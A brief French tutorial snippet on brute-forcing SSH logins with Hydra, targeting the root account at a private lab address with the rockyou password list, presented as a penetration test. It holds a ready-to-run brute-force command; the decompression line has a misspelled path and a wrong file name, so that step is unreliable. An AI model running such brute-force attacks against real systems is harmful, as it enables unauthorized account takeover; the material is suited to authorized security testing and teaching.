Brute-force SSH

Pour faire un test d'intrusion sur l'accès SSH, vous allez utiliser la commande :

hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.99.11

Attention, par défaut cette liste n'est pas activée, il faut donc décompresser cette dernière :

gunzip /usr/share/worldlists/rockyou.tar.gz

Le -l root cible le login "root" eet -P cible les mots de passe avec le fichier qu'on lui donne (rockyou.txt).